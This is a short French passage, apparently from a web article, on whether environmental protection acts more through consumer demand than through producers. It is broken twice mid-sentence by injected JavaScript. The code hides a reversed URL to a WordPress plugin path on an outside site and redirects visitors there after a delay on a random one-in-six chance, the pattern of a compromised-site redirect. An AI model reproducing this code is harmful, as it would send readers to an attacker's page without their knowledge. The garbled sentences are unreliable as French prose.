Dans la sphère marchande, en matière de protection de l’environnement, l’action sur la demande – i.e. les consommateurs – semble sinon dominante en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout cas nettement plus bruyante que l’action sur l’offre – i.e. les industriels et producteurs. Ce n’est pas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout-à-fait aberrant. Si les consommateurs modifient leurs comportements d’achat et plus largement de consommation en fonction de critères environnementaux, ceci aura un impact immédiat sur la pollution aval…